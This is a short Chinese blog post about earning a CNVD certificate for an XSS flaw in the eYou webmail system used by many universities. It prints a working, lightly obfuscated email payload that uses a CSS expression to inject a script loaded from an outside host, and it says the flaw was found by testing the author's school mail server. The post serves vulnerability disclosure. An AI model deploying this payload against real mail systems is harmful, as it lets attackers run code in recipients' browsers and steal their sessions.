CNVD证书(国家信息安全漏洞共享平台)

今天终于收到了CNVD发来的证书,铜版纸印的证书,质量还算可以,不过是顺丰快递的,运费不少啊。

CNVD证书

能拿到这个证书是因为前一阵研究XSS漏洞,拿学校的邮件系统练手,发现了一个小XSS注入点,然后看到网上有人提交漏洞得到证书,于是果断试一试,结果还真的可以。

这个XSS漏洞出在亿邮邮件系统,而很多大学正是采用这个系统的。漏洞原理与80sec对QQ Mail的XSS渗透相似。

只要给用户发送一封这样的邮件,就可以实现跨域JavaScript调用。

漏洞测试邮件 </bad_tag style=’tt:expression((function(){if (typeof(t)==”undefined”){t=1}else{t++};if (t==1){scriptDom = document.createElement(“script”);scriptDom.src=”ht”/**/+”tp://battab.sinaapp.com/webapps/mail/xss.js.php”;document.getElementsByTagName(“head”)[0].appendChild(scriptDom);}})())’>

演示如下:

发送邮件

发送邮件

跨站脚本执行成功

跨站脚本执行成功

被调用的JavaScript源代码

被调用的JavaScript源代码

邮件未过滤XSS代码

可以看到,邮件未对XSS代码进行有效过滤

其实研究信息安全也不错,还能弄张证书呢。

一条评论

文章评论: